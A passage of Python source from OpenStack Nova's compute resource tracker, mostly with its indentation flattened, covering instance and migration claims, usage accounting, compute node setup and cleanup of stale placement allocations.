rc = resource.resource_class
self.assigned_resources[rp_uuid][rc].add(resource)
def _set_instance_host_and_node(self, instance, nodename):
# NOTE(mriedem): ComputeManager._nil_out_instance_obj_host_and_node is
# somewhat tightly coupled to the fields set in this method so if this
# method changes that method might need to be updated.
instance.host = self.host
instance.launched_on = self.host
instance.node = nodename
instance.save()
def _unset_instance_host_and_node(self, instance):
instance.host = None
instance.node = None
instance.save()
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def abort_instance_claim(self, context, instance, nodename):
self._update_usage_from_instance(context, instance, nodename,
is_removed=True)
instance.clear_numa_topology()
self._unset_instance_host_and_node(instance)
self._update(context.elevated(), self.compute_nodes[nodename])
def _drop_pci_devices(self, instance, nodename, prefix):
if self.pci_tracker:
# free old/new allocated pci devices
pci_devices = self._get_migration_context_resource(
'pci_devices', instance, prefix=prefix)
if pci_devices:
for pci_device in pci_devices:
self.pci_tracker.free_device(pci_device, instance)
dev_pools_obj = self.pci_tracker.stats.to_device_pools_obj()
self.compute_nodes[nodename].pci_device_pools = dev_pools_obj
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def drop_move_claim_at_source(self, context, instance, migration):
migration.status = 'confirmed'
migration.save()
self._drop_move_claim(
context, instance, migration.source_node, instance.old_flavor,
prefix='old_')
# NOTE(stephenfin): Unsetting this is unnecessary for cross-cell
# resize, since the source and dest instance objects are different and
        # the source instance will be deleted soon. It's easier to just do
        # it though.
instance.drop_migration_context()
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def drop_move_claim_at_dest(self, context, instance, migration):
        # Set the migration status to 'reverted' to indicate that we no
        # longer need to account for usage on this host.
migration.status = 'reverted'
migration.save()
self._drop_move_claim(
context, instance, migration.dest_node, instance.new_flavor,
prefix='new_')
instance.revert_migration_context()
instance.save(expected_task_state=[task_states.RESIZE_REVERTING])
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def drop_move_claim(self, context, instance, nodename,
flavor=None, prefix='new_'):
self._drop_move_claim(
context, instance, nodename, flavor, prefix='new_')
def _drop_move_claim(
self, context, instance, nodename, flavor=None, prefix='new_',
):
# Remove usage for an instance that is tracked in migrations, such as
# on the dest node during revert resize.
if instance['uuid'] in self.tracked_migrations:
migration = self.tracked_migrations.pop(instance['uuid'])
if not flavor:
flavor = self._get_flavor(instance, prefix, migration)
# Remove usage for an instance that is not tracked in migrations (such
# as on the source node after a migration).
# NOTE(lbeliveau): On resize on the same node, the instance is
# included in both tracked_migrations and tracked_instances.
elif instance['uuid'] in self.tracked_instances:
self.tracked_instances.remove(instance['uuid'])
if flavor is not None:
numa_topology = self._get_migration_context_resource(
'numa_topology', instance, prefix=prefix)
usage = self._get_usage_dict(
flavor, instance, numa_topology=numa_topology)
self._drop_pci_devices(instance, nodename, prefix)
resources = self._get_migration_context_resource(
'resources', instance, prefix=prefix)
self._release_assigned_resources(resources)
self._update_usage(usage, nodename, sign=-1)
ctxt = context.elevated()
self._update(ctxt, self.compute_nodes[nodename])
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def update_usage(self, context, instance, nodename):
if self.disabled(nodename):
return
uuid = instance['uuid']
        # don't update usage for this instance unless it submitted a resource
        # claim first:
if uuid in self.tracked_instances:
self._update_usage_from_instance(context, instance, nodename)
self._update(context.elevated(), self.compute_nodes[nodename])
def disabled(self, nodename):
return (nodename not in self.compute_nodes or
not self.driver.node_is_available(nodename))
def _check_for_nodes_rebalance(self, context, resources, nodename):
if not self.driver.rebalances_nodes:
return False
# check if there is a compute node that already has the correct
# hypervisor_hostname. We can re-use that rather than create a
# new one and have to move existing placement allocations
cn_candidates = objects.ComputeNodeList.get_by_hypervisor(
context, nodename)
if len(cn_candidates) == 1:
cn = cn_candidates[0]
LOG.info("ComputeNode %(name)s moving from %(old)s to %(new)s",
{"name": nodename, "old": cn.host, "new": self.host})
cn.host = self.host
self.compute_nodes[nodename] = cn
self._copy_resources(cn, resources)
self._setup_pci_tracker(context, cn, resources)
self._update(context, cn)
return True
elif len(cn_candidates) > 1:
LOG.error(
"Found more than one ComputeNode for nodename %s. "
"Please clean up the orphaned ComputeNode records in your DB.",
nodename)
return False
def _init_compute_node(self, context, resources):
nodename = resources['hypervisor_hostname']
# if there is already a compute node just use resources
# to initialize
if nodename in self.compute_nodes:
cn = self.compute_nodes[nodename]
self._copy_resources(cn, resources)
self._setup_pci_tracker(context, cn, resources)
return False
# now try to get the compute node record from the
# database. If we get one we use resources to initialize
cn = self._get_compute_node(context, nodename)
if cn:
self.compute_nodes[nodename] = cn
self._copy_resources(cn, resources)
self._setup_pci_tracker(context, cn, resources)
return False
if self._check_for_nodes_rebalance(context, resources, nodename):
return False
# there was no local copy and none in the database
# so we need to create a new compute node. This needs
# to be initialized with resource values.
cn = objects.ComputeNode(context)
cn.host = self.host
self._copy_resources(cn, resources, initial=True)
cn.create()
# Only map the ComputeNode into compute_nodes if create() was OK
# because if create() fails, on the next run through here nodename
        # would be in compute_nodes and we won't try to create again (because
        # of the check above).
self.compute_nodes[nodename] = cn
LOG.info('Compute node record created for '
'%(host)s:%(node)s with uuid: %(uuid)s',
{'host': self.host, 'node': nodename, 'uuid': cn.uuid})
self._setup_pci_tracker(context, cn, resources)
return True
def _setup_pci_tracker(self, context, compute_node, resources):
if not self.pci_tracker:
self.pci_tracker = pci_manager.PciDevTracker(context, compute_node)
if 'pci_passthrough_devices' in resources:
dev_json = resources.pop('pci_passthrough_devices')
self.pci_tracker.update_devices_from_hypervisor_resources(
dev_json)
dev_pools_obj = self.pci_tracker.stats.to_device_pools_obj()
compute_node.pci_device_pools = dev_pools_obj
def _copy_resources(self, compute_node, resources, initial=False):
nodename = resources['hypervisor_hostname']
stats = self.stats[nodename]
prev_failed_builds = stats.get('failed_builds', 0)
stats.clear()
stats['failed_builds'] = prev_failed_builds
stats.digest_stats(resources.get('stats'))
compute_node.stats = stats
        # When the configured ratios are 0.0 or None the ComputeNode object
        # supplies its own defaults, e.g. a
        # ComputeNode.cpu_allocation_ratio of 16.0. We want to avoid
        # resetting the ComputeNode fields to None because that will make
        # the _resource_change method think something changed when really it
        # didn't.
for res in ('cpu', 'disk', 'ram'):
attr = '%s_allocation_ratio' % res
if initial:
conf_alloc_ratio = getattr(CONF, 'initial_%s' % attr)
else:
conf_alloc_ratio = getattr(self, attr)
if conf_alloc_ratio not in (0.0, None):
setattr(compute_node, attr, conf_alloc_ratio)
compute_node.update_from_virt_driver(resources)
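    # Illustrative note (not part of the original module): in the loop
    # above, initial=True reads CONF.initial_cpu_allocation_ratio (and the
    # ram/disk equivalents) while initial=False reads the values cached in
    # __init__ from CONF.cpu_allocation_ratio etc.; a configured value of
    # 0.0 or None leaves the existing ComputeNode field untouched.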
def remove_node(self, nodename):
self.stats.pop(nodename, None)
self.compute_nodes.pop(nodename, None)
self.old_resources.pop(nodename, None)
def _get_host_metrics(self, context, nodename):
metrics = objects.MonitorMetricList()
metrics_info = {}
for monitor in self.monitors:
try:
monitor.populate_metrics(metrics)
except NotImplementedError:
LOG.debug("The compute driver doesn't support host "
"metrics for %(mon)s", {'mon': monitor})
except Exception as exc:
LOG.warning("Cannot get the metrics from %(mon)s; "
"error: %(exc)s",
{'mon': monitor, 'exc': exc})
        # TODO(jaypipes): Remove this when compute_node.metrics doesn't need
        # to be populated anymore.
metric_list = metrics.to_list()
if len(metric_list):
metrics_info['nodename'] = nodename
metrics_info['metrics'] = metric_list
metrics_info['host'] = self.host
metrics_info['host_ip'] = CONF.my_ip
notifier = rpc.get_notifier(service='compute', host=nodename)
notifier.info(context, 'compute.metrics.update', metrics_info)
compute_utils.notify_about_metrics_update(
context, self.host, CONF.my_ip, nodename, metrics)
return metric_list
def update_available_resource(self, context, nodename, startup=False):
LOG.debug("Auditing locally available compute resources for "
"%(host)s (node: %(node)s)",
{'node': nodename,
'host': self.host})
resources = self.driver.get_available_resource(nodename)
resources['host_ip'] = CONF.my_ip
if "cpu_info" not in resources or resources["cpu_info"] is None:
resources["cpu_info"] = ''
self._verify_resources(resources)
self._report_hypervisor_resource_view(resources)
self._update_available_resource(context, resources, startup=startup)
def _pair_instances_to_migrations(self, migrations, instance_by_uuid):
for migration in migrations:
try:
migration.instance = instance_by_uuid[migration.instance_uuid]
except KeyError:
                # If this happens we don't set the instance here; we just
                # let the code either fail or lazy-load the instance later,
                # which is what happened before we added this optimization.
                # NOTE(tdurakov): this situation is possible for resize/cold
                # migration when the migration is finished but hasn't yet
                # been confirmed/reverted, in which case the instance has
                # already changed host to the destination compute.
LOG.debug('Migration for instance %(uuid)s refers to '
'another host\'s instance!',
{'uuid': migration.instance_uuid})
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def _update_available_resource(self, context, resources, startup=False):
# initialize the compute node object, creating it
# if it does not already exist.
is_new_compute_node = self._init_compute_node(context, resources)
nodename = resources['hypervisor_hostname']
# if we could not init the compute node the tracker will be
# disabled and we should quit now
if self.disabled(nodename):
return
# Grab all instances assigned to this node:
instances = objects.InstanceList.get_by_host_and_node(
context, self.host, nodename,
expected_attrs=['system_metadata',
'numa_topology',
'flavor', 'migration_context',
'resources'])
# Grab all in-progress migrations and error migrations:
migrations = objects.MigrationList.get_in_progress_and_error(
context, self.host, nodename)
        # Check for tracked instances with in-progress, incoming, but not
        # finished migrations. For those instances the migration context
        # is not applied yet (it will be during finish_resize when the
        # migration goes to finished state). We need to manually and
        # temporarily apply the migration context here when the resource
        # usage is updated. See bug 1953359 for more details.
instance_by_uuid = {instance.uuid: instance for instance in instances}
for migration in migrations:
if (
migration.instance_uuid in instance_by_uuid and
migration.dest_compute == self.host and
migration.dest_node == nodename
):
                # we do not check for the 'post-migrating' migration status
# as applying the migration context for an instance already
# in finished migration status is a no-op anyhow.
instance = instance_by_uuid[migration.instance_uuid]
LOG.debug(
'Applying migration context for instance %s as it has an '
'incoming, in-progress migration %s. '
'Migration status is %s',
migration.instance_uuid, migration.uuid, migration.status
)
# It is OK not to revert the migration context at the end of
# the periodic as the instance is not saved during the periodic
instance.apply_migration_context()
# Now calculate usage based on instance utilization:
instance_by_uuid = self._update_usage_from_instances(
context, instances, nodename)
self._pair_instances_to_migrations(migrations, instance_by_uuid)
self._update_usage_from_migrations(context, migrations, nodename)
        # A new compute node means there won't be a resource provider yet,
        # since that would be created via the _update() call below; and if
        # there is no resource provider then there are no allocations against
        # it to clean up.
if not is_new_compute_node:
self._remove_deleted_instances_allocations(
context, self.compute_nodes[nodename], migrations,
instance_by_uuid)
cn = self.compute_nodes[nodename]
self.pci_tracker.clean_usage(instances, migrations)
dev_pools_obj = self.pci_tracker.stats.to_device_pools_obj()
cn.pci_device_pools = dev_pools_obj
self._report_final_resource_view(nodename)
metrics = self._get_host_metrics(context, nodename)
cn.metrics = jsonutils.dumps(metrics)
self._populate_assigned_resources(context, instance_by_uuid)
self._update(context, cn, startup=startup)
LOG.debug('Compute_service record updated for %(host)s:%(node)s',
{'host': self.host, 'node': nodename})
if startup:
self._check_resources(context)
def _get_compute_node(self, context, nodename):
try:
return objects.ComputeNode.get_by_host_and_nodename(
context, self.host, nodename)
except exception.NotFound:
LOG.warning("No compute node record for %(host)s:%(node)s",
{'host': self.host, 'node': nodename})
def _report_hypervisor_resource_view(self, resources):
nodename = resources['hypervisor_hostname']
free_ram_mb = resources['memory_mb'] - resources['memory_mb_used']
free_disk_gb = resources['local_gb'] - resources['local_gb_used']
vcpus = resources['vcpus']
if vcpus:
free_vcpus = vcpus - resources['vcpus_used']
else:
free_vcpus = 'unknown'
pci_devices = resources.get('pci_passthrough_devices')
LOG.debug("Hypervisor/Node resource view: "
"name=%(node)s "
"free_ram=%(free_ram)sMB "
"free_disk=%(free_disk)sGB "
"free_vcpus=%(free_vcpus)s "
"pci_devices=%(pci_devices)s",
{'node': nodename,
'free_ram': free_ram_mb,
'free_disk': free_disk_gb,
'free_vcpus': free_vcpus,
'pci_devices': pci_devices})
def _report_final_resource_view(self, nodename):
cn = self.compute_nodes[nodename]
vcpus = cn.vcpus
if vcpus:
tcpu = vcpus
ucpu = cn.vcpus_used
LOG.debug("Total usable vcpus: %(tcpu)s, "
"total allocated vcpus: %(ucpu)s",
{'tcpu': vcpus,
'ucpu': ucpu})
else:
tcpu = 0
ucpu = 0
pci_stats = (list(cn.pci_device_pools) if
cn.pci_device_pools else [])
LOG.debug("Final resource view: "
"name=%(node)s "
"phys_ram=%(phys_ram)sMB "
"used_ram=%(used_ram)sMB "
"phys_disk=%(phys_disk)sGB "
"used_disk=%(used_disk)sGB "
"total_vcpus=%(total_vcpus)s "
"used_vcpus=%(used_vcpus)s "
"pci_stats=%(pci_stats)s",
{'node': nodename,
'phys_ram': cn.memory_mb,
'used_ram': cn.memory_mb_used,
'phys_disk': cn.local_gb,
'used_disk': cn.local_gb_used,
'total_vcpus': tcpu,
'used_vcpus': ucpu,
'pci_stats': pci_stats})
def _resource_change(self, compute_node):
nodename = compute_node.hypervisor_hostname
old_compute = self.old_resources[nodename]
if not obj_base.obj_equal_prims(
compute_node, old_compute, ['updated_at']):
self.old_resources[nodename] = copy.deepcopy(compute_node)
return True
return False
def _sync_compute_service_disabled_trait(self, context, traits):
trait = os_traits.COMPUTE_STATUS_DISABLED
try:
service = objects.Service.get_by_compute_host(context, self.host)
if service.disabled:
traits.add(trait)
else:
traits.discard(trait)
except exception.NotFound:
LOG.error('Unable to find services table record for nova-compute '
'host %s', self.host)
def _get_traits(self, context, nodename, provider_tree):
traits = provider_tree.data(nodename).traits
        # Now get the driver's capabilities and add any supported
        # traits that are missing, and remove any existing set traits
        # that are not currently supported.
for trait, supported in self.driver.capabilities_as_traits().items():
if supported:
traits.add(trait)
elif trait in traits:
traits.remove(trait)
traits.add(os_traits.COMPUTE_NODE)
self._sync_compute_service_disabled_trait(context, traits)
return list(traits)
@retrying.retry(stop_max_attempt_number=4,
retry_on_exception=lambda e: isinstance(
e, exception.ResourceProviderUpdateConflict))
def _update_to_placement(self, context, compute_node, startup):
        # Even if there is no resource change for compute_node, we still need
# to get inventory and use report client interfaces to update
# inventory to placement. It's report client's responsibility to
# ensure the update request to placement only happens when inventory
# is changed.
nodename = compute_node.hypervisor_hostname
# Persist the stats to the Scheduler
# Retrieve the provider tree associated with this compute node. If
        # it doesn't exist yet, this will create it with a (single, root)
        # provider corresponding to the compute node.
prov_tree = self.reportclient.get_provider_tree_and_ensure_root(
context, compute_node.uuid, name=compute_node.hypervisor_hostname)
allocs = None
try:
self.driver.update_provider_tree(prov_tree, nodename)
except exception.ReshapeNeeded:
if not startup:
                # This isn't supposed to happen during a periodic run, so
                # re-raise and let the exception bubble up; the compute
                # manager will treat it specially.
raise
LOG.info("Performing resource provider inventory and "
"allocation data migration during compute service "
"startup or fast-forward upgrade.")
allocs = self.reportclient.get_allocations_for_provider_tree(
context, nodename)
self.driver.update_provider_tree(prov_tree, nodename,
allocations=allocs)
# Inject driver capabilities traits into the provider
# tree. We need to determine the traits that the virt
# driver owns - so those that come from the tree itself
# (via the virt driver) plus the compute capabilities
# traits, and then merge those with the traits set
# externally that the driver does not own - and remove any
# set on the provider externally that the virt owns but
        # aren't in the current list of supported traits. For
        # example, a capability trait may be reported at t1 and then at t2
        # it's not, so we need to remove it; but a CUSTOM_* trait present at
        # both t1 and t2 must be left alone because it
        # was set externally on the provider.
# We also want to sync the COMPUTE_STATUS_DISABLED trait based
# on the related nova-compute service's disabled status.
traits = self._get_traits(
context, nodename, provider_tree=prov_tree)
prov_tree.update_traits(nodename, traits)
self.provider_tree = prov_tree
self._merge_provider_configs(self.provider_configs, prov_tree)
self.reportclient.update_from_provider_tree(context, prov_tree,
allocations=allocs)
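    # Illustrative note (not part of the original module): the @retrying
    # decorator above retries _update_to_placement up to four times, but
    # only on ResourceProviderUpdateConflict (a placement generation
    # conflict); any other exception propagates immediately.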
def _update(self, context, compute_node, startup=False):
# _resource_change will update self.old_resources if it detects changes
# but we want to restore those if compute_node.save() fails.
nodename = compute_node.hypervisor_hostname
old_compute = self.old_resources[nodename]
if self._resource_change(compute_node):
            # If the compute_node's resource changed, update to DB. Note that
            # on save failure self.old_resources is restored in the except
            # block below so the change will be detected again on the next
            # periodic run.
try:
compute_node.save()
except Exception:
with excutils.save_and_reraise_exception(logger=LOG):
self.old_resources[nodename] = old_compute
self._update_to_placement(context, compute_node, startup)
if self.pci_tracker:
self.pci_tracker.save(context)
def _update_usage(self, usage, nodename, sign=1):
        # TODO(stephenfin): We don't use the CPU, RAM and disk fields for much
        # except 'Aggregate(Core|Ram|Disk)Filter', the 'os-hypervisors' API,
# and perhaps some out-of-tree filters. Once the in-tree stuff is
# removed or updated to use information from placement, we can think
# about dropping the fields from the 'ComputeNode' object entirely
mem_usage = usage['memory_mb']
disk_usage = usage.get('root_gb', 0)
vcpus_usage = usage.get('vcpus', 0)
cn = self.compute_nodes[nodename]
cn.memory_mb_used += sign * mem_usage
cn.local_gb_used += sign * disk_usage
cn.local_gb_used += sign * usage.get('ephemeral_gb', 0)
cn.local_gb_used += sign * usage.get('swap', 0) / 1024
cn.vcpus_used += sign * vcpus_usage
# free ram and disk may be negative, depending on policy:
cn.free_ram_mb = cn.memory_mb - cn.memory_mb_used
cn.free_disk_gb = cn.local_gb - cn.local_gb_used
stats = self.stats[nodename]
cn.running_vms = stats.num_instances
# calculate the NUMA usage, assuming the instance is actually using
# NUMA, of course
if cn.numa_topology and usage.get('numa_topology'):
instance_numa_topology = usage.get('numa_topology')
# the ComputeNode.numa_topology field is a StringField, so
# deserialize
host_numa_topology = objects.NUMATopology.obj_from_db_obj(
cn.numa_topology)
free = sign == -1
# ...and reserialize once we save it back
cn.numa_topology = hardware.numa_usage_from_instance_numa(
host_numa_topology, instance_numa_topology, free)._to_json()
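    # Illustrative sketch (not part of the original module): the usage
    # arithmetic above for a made-up flavor with 4 vcpus, 8192 MB RAM,
    # 80 GB root disk, 10 GB ephemeral and 1024 MB swap, with sign=1:
    #
    #     cn.memory_mb_used += 8192
    #     cn.local_gb_used  += 80 + 10 + 1024 / 1024  # root + eph + swap(GB)
    #     cn.vcpus_used     += 4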
def _get_migration_context_resource(self, resource, instance,
prefix='new_'):
migration_context = instance.migration_context
resource = prefix + resource
if migration_context and resource in migration_context:
return getattr(migration_context, resource)
return None
def _update_usage_from_migration(self, context, instance, migration,
nodename):
uuid = migration.instance_uuid
LOG.info("Updating resource usage from migration %s", migration.uuid,
instance_uuid=uuid)
incoming = (migration.dest_compute == self.host and
migration.dest_node == nodename)
outbound = (migration.source_compute == self.host and
migration.source_node == nodename)
same_node = (incoming and outbound)
tracked = uuid in self.tracked_instances
itype = None
numa_topology = None
sign = 0
if same_node:
# Same node resize. Record usage for the 'new_' resources. This
# is executed on resize_claim().
if instance['instance_type_id'] == migration.old_instance_type_id:
itype = self._get_flavor(instance, 'new_', migration)
numa_topology = self._get_migration_context_resource(
'numa_topology', instance)
# Allocate pci device(s) for the instance.
sign = 1
else:
# The instance is already set to the new flavor (this is done
# by the compute manager on finish_resize()), hold space for a
# possible revert to the 'old_' resources.
# NOTE(lbeliveau): When the periodic audit timer gets
# triggered, the compute usage gets reset. The usage for an
# instance that is migrated to the new flavor but not yet
# confirmed/reverted will first get accounted for by
# _update_usage_from_instances(). This method will then be
# called, and we need to account for the '_old' resources
# (just in case).
itype = self._get_flavor(instance, 'old_', migration)
numa_topology = self._get_migration_context_resource(
'numa_topology', instance, prefix='old_')
elif incoming and not tracked:
# instance has not yet migrated here:
itype = self._get_flavor(instance, 'new_', migration)
numa_topology = self._get_migration_context_resource(
'numa_topology', instance)
# Allocate pci device(s) for the instance.
sign = 1
LOG.debug('Starting to track incoming migration %s with flavor %s',
migration.uuid, itype.flavorid, instance=instance)
elif outbound and not tracked:
# instance migrated, but record usage for a possible revert:
itype = self._get_flavor(instance, 'old_', migration)
numa_topology = self._get_migration_context_resource(
'numa_topology', instance, prefix='old_')
# We could be racing with confirm_resize setting the
# instance.old_flavor field to None before the migration status
# is "confirmed" so if we did not find the flavor in the outgoing
# resized instance we won't track it.
if itype:
LOG.debug('Starting to track outgoing migration %s with '
'flavor %s', migration.uuid, itype.flavorid,
instance=instance)
if itype:
cn = self.compute_nodes[nodename]
usage = self._get_usage_dict(
itype, instance, numa_topology=numa_topology)
if self.pci_tracker and sign:
self.pci_tracker.update_pci_for_instance(
context, instance, sign=sign)
self._update_usage(usage, nodename)
if self.pci_tracker:
obj = self.pci_tracker.stats.to_device_pools_obj()
cn.pci_device_pools = obj
else:
obj = objects.PciDevicePoolList()
cn.pci_device_pools = obj
self.tracked_migrations[uuid] = migration
def _update_usage_from_migrations(self, context, migrations, nodename):
filtered = {}
instances = {}
self.tracked_migrations.clear()
for migration in migrations:
uuid = migration.instance_uuid
try:
if uuid not in instances:
migration._context = context.elevated(read_deleted='yes')
instances[uuid] = migration.instance
except exception.InstanceNotFound as e:
LOG.debug('Migration instance not found: %s', e)
continue
if (not _instance_in_resize_state(instances[uuid]) and not
_instance_is_live_migrating(instances[uuid])):
LOG.debug('Skipping migration as instance is neither '
'resizing nor live-migrating.', instance_uuid=uuid)
continue
other_migration = filtered.get(uuid, None)
if other_migration:
om = other_migration
other_time = om.updated_at or om.created_at
migration_time = migration.updated_at or migration.created_at
if migration_time > other_time:
filtered[uuid] = migration
else:
filtered[uuid] = migration
for migration in filtered.values():
instance = instances[migration.instance_uuid]
            # Skip migration (and mark it as error) if it doesn't match the
            # instance migration id.
# This can happen if we have a stale migration record.
# We want to proceed if instance.migration_context is None
if (instance.migration_context is not None and
instance.migration_context.migration_id != migration.id):
LOG.info("Current instance migration %(im)s doesn't match "
"migration %(m)s, marking migration as error. "
"This can occur if a previous migration for this "
"instance did not complete.",
{'im': instance.migration_context.migration_id,
'm': migration.id})
migration.status = "error"
migration.save()
continue
try:
self._update_usage_from_migration(context, instance, migration,
nodename)
except exception.FlavorNotFound:
LOG.warning("Flavor could not be found, skipping migration.",
instance_uuid=instance.uuid)
continue
def _update_usage_from_instance(self, context, instance, nodename,
is_removed=False):
uuid = instance['uuid']
is_new_instance = uuid not in self.tracked_instances
is_removed_instance = not is_new_instance and (is_removed or
instance['vm_state'] in vm_states.ALLOW_RESOURCE_REMOVAL)
if is_new_instance:
self.tracked_instances.add(uuid)
sign = 1
if is_removed_instance:
self.tracked_instances.remove(uuid)
self._release_assigned_resources(instance.resources)
sign = -1
cn = self.compute_nodes[nodename]
stats = self.stats[nodename]
stats.update_stats_for_instance(instance, is_removed_instance)
cn.stats = stats
if is_new_instance or is_removed_instance:
if self.pci_tracker:
self.pci_tracker.update_pci_for_instance(context,
instance,
sign=sign)
# new instance, update compute node resource usage:
self._update_usage(self._get_usage_dict(instance, instance),
nodename, sign=sign)
# Stop tracking removed instances in the is_bfv cache. This needs to
# happen *after* calling _get_usage_dict() since that relies on the
# is_bfv cache.
if is_removed_instance and uuid in self.is_bfv:
del self.is_bfv[uuid]
cn.current_workload = stats.calculate_workload()
if self.pci_tracker:
obj = self.pci_tracker.stats.to_device_pools_obj()
cn.pci_device_pools = obj
else:
cn.pci_device_pools = objects.PciDevicePoolList()
def _update_usage_from_instances(self, context, instances, nodename):
self.tracked_instances.clear()
cn = self.compute_nodes[nodename]
# set some initial values, reserve room for host/hypervisor:
cn.local_gb_used = CONF.reserved_host_disk_mb / 1024
cn.memory_mb_used = CONF.reserved_host_memory_mb
cn.vcpus_used = CONF.reserved_host_cpus
cn.free_ram_mb = (cn.memory_mb - cn.memory_mb_used)
cn.free_disk_gb = (cn.local_gb - cn.local_gb_used)
cn.current_workload = 0
cn.running_vms = 0
instance_by_uuid = {}
for instance in instances:
if instance.vm_state not in vm_states.ALLOW_RESOURCE_REMOVAL:
self._update_usage_from_instance(context, instance, nodename)
instance_by_uuid[instance.uuid] = instance
return instance_by_uuid
def _remove_deleted_instances_allocations(self, context, cn,
migrations, instance_by_uuid):
migration_uuids = [migration.uuid for migration in migrations
if 'uuid' in migration]
        # NOTE(jaypipes): All of this code sucks. It's basically dealing with
        # all the corner cases in move, local delete, unshelve and rebuild
        # operations for when allocations should be deleted when things didn't
        # happen according to the normal flow of events where the scheduler
        # always creates allocations for an instance
try:
# pai: report.ProviderAllocInfo namedtuple
pai = self.reportclient.get_allocations_for_resource_provider(
context, cn.uuid)
except (exception.ResourceProviderAllocationRetrievalFailed,
ks_exc.ClientException) as e:
LOG.error("Skipping removal of allocations for deleted instances: "
"%s", e)
return
allocations = pai.allocations
if not allocations:
# The main loop below would short-circuit anyway, but this saves us
# the (potentially expensive) context.elevated construction below.
return
read_deleted_context = context.elevated(read_deleted='yes')
for consumer_uuid, alloc in allocations.items():
if consumer_uuid in self.tracked_instances:
LOG.debug("Instance %s actively managed on this compute host "
"and has allocations in placement: %s.",
consumer_uuid, alloc)
continue
if consumer_uuid in migration_uuids:
LOG.debug("Migration %s is active on this compute host "
"and has allocations in placement: %s.",
consumer_uuid, alloc)
continue
# We know these are instances now, so proceed
instance_uuid = consumer_uuid
instance = instance_by_uuid.get(instance_uuid)
if not instance:
try:
instance = objects.Instance.get_by_uuid(
read_deleted_context, consumer_uuid,
expected_attrs=[])
except exception.InstanceNotFound:
                    # The instance isn't even in the database. Either we are
                    # racing with the creation in the cell database, or the
# instance was deleted and fully archived before we got a
# chance to run this. The former is far more likely than
# the latter. Avoid deleting allocations for a building
# instance here.
LOG.info("Instance %(uuid)s has allocations against this "
"compute host but is not found in the database.",
{'uuid': instance_uuid},
exc_info=False)
continue
# NOTE(mriedem): A cross-cell migration will work with instance
            # records across two cells and once the migration is
            # confirmed/reverted
# one of them will be deleted but the instance still exists in the
# other cell. Before the instance is destroyed from the old cell
# though it is marked hidden=True so if we find a deleted hidden
# instance with allocations against this compute node we just
# ignore it since the migration operation will handle cleaning up
# those allocations.
if instance.deleted and not instance.hidden:
# The instance is gone, so we definitely want to remove
# allocations associated with it.
LOG.debug("Instance %s has been deleted (perhaps locally). "
"Deleting allocations that remained for this "
"instance against this compute host: %s.",
instance_uuid, alloc)
                # We don't force delete the allocation in this case because if
                # the delete fails it will be retried on the next
                # update_available_resource periodic run.
self.reportclient.delete_allocation_for_instance(context,
instance_uuid,
force=False)
continue
if not instance.host:
# Allocations related to instances being scheduled should not
# be deleted if we already wrote the allocation previously.
LOG.debug("Instance %s has been scheduled to this compute "
"host, the scheduler has made an allocation "
"against this compute node but the instance has "
"yet to start. Skipping heal of allocation: %s.",
instance_uuid, alloc)
continue
if (instance.host == cn.host and
instance.node == cn.hypervisor_hostname):
# The instance is supposed to be on this compute host but is
# not in the list of actively managed instances. This could be
# because we are racing with an instance_claim call during
# initial build or unshelve where the instance host/node is set
# before the instance is added to tracked_instances. If the
# task_state is set, then consider things in motion and log at
# debug level instead of warning.
if instance.task_state:
LOG.debug('Instance with task_state "%s" is not being '
'actively managed by this compute host but has '
'allocations referencing this compute node '
'(%s): %s. Skipping heal of allocations during '
'the task state transition.',
instance.task_state, cn.uuid, alloc,
instance=instance)
else:
LOG.warning("Instance %s is not being actively managed by "
"this compute host but has allocations "
"referencing this compute host: %s. Skipping "
"heal of allocation because we do not know "
"what to do.", instance_uuid, alloc)
continue
if instance.host != cn.host:
# The instance has been moved to another host either via a
# migration, evacuation or unshelve in between the time when we
# ran InstanceList.get_by_host_and_node(), added those
# instances to RT.tracked_instances and the above
# Instance.get_by_uuid() call. We SHOULD attempt to remove any
# allocations that reference this compute host if the VM is in
                # a stable terminal state (i.e. it isn't in a state of waiting
                # for a move operation to complete), but for now we just log
                # the situation here for information and don't attempt to
                # delete or change the allocations.
LOG.warning("Instance %s has been moved to another host "
"%s(%s). There are allocations remaining against "
"the source host that might need to be removed: "
"%s.",
instance_uuid, instance.host, instance.node, alloc)
def delete_allocation_for_evacuated_instance(self, context, instance, node,
node_type='source'):
cn_uuid = self.compute_nodes[node].uuid
if not self.reportclient.remove_provider_tree_from_instance_allocation(
context, instance.uuid, cn_uuid):
LOG.error("Failed to clean allocation of evacuated "
"instance on the %s node %s",
node_type, cn_uuid, instance=instance)
def delete_allocation_for_shelve_offloaded_instance(self, context,
instance):
self.reportclient.delete_allocation_for_instance(
context, instance.uuid, force=True)
def _verify_resources(self, resources):
resource_keys = ["vcpus", "memory_mb", "local_gb", "cpu_info",
"vcpus_used", "memory_mb_used", "local_gb_used",
"numa_topology"]
missing_keys = [k for k in resource_keys if k not in resources]
if missing_keys:
reason = _("Missing keys: %s") % missing_keys
raise exception.InvalidInput(reason=reason)
def _get_flavor(self, instance, prefix, migration):
if migration.is_resize:
return getattr(instance, '%sflavor' % prefix)
return instance.flavor
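    # NOTE: _get_usage_dict below normalizes an Instance, Flavor or plain
    # dict into the usage dict consumed by _update_usage(). Boot-from-volume
    # instances report root_gb as 0 because their root disk lives on the
    # volume backend rather than on this compute node's local storage.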
def _get_usage_dict(self, object_or_dict, instance, **updates):
def _is_bfv():
if instance.uuid in self.is_bfv:
is_bfv = self.is_bfv[instance.uuid]
else:
is_bfv = compute_utils.is_volume_backed_instance(
instance._context, instance)
self.is_bfv[instance.uuid] = is_bfv
return is_bfv
usage = {}
if isinstance(object_or_dict, objects.Instance):
is_bfv = _is_bfv()
usage = {'memory_mb': object_or_dict.flavor.memory_mb,
'swap': object_or_dict.flavor.swap,
'vcpus': object_or_dict.flavor.vcpus,
'root_gb': (0 if is_bfv else
object_or_dict.flavor.root_gb),
'ephemeral_gb': object_or_dict.flavor.ephemeral_gb,
'numa_topology': object_or_dict.numa_topology}
elif isinstance(object_or_dict, objects.Flavor):
usage = obj_base.obj_to_primitive(object_or_dict)
if _is_bfv():
usage['root_gb'] = 0
else:
usage.update(object_or_dict)
for key in ('numa_topology',):
if key in updates:
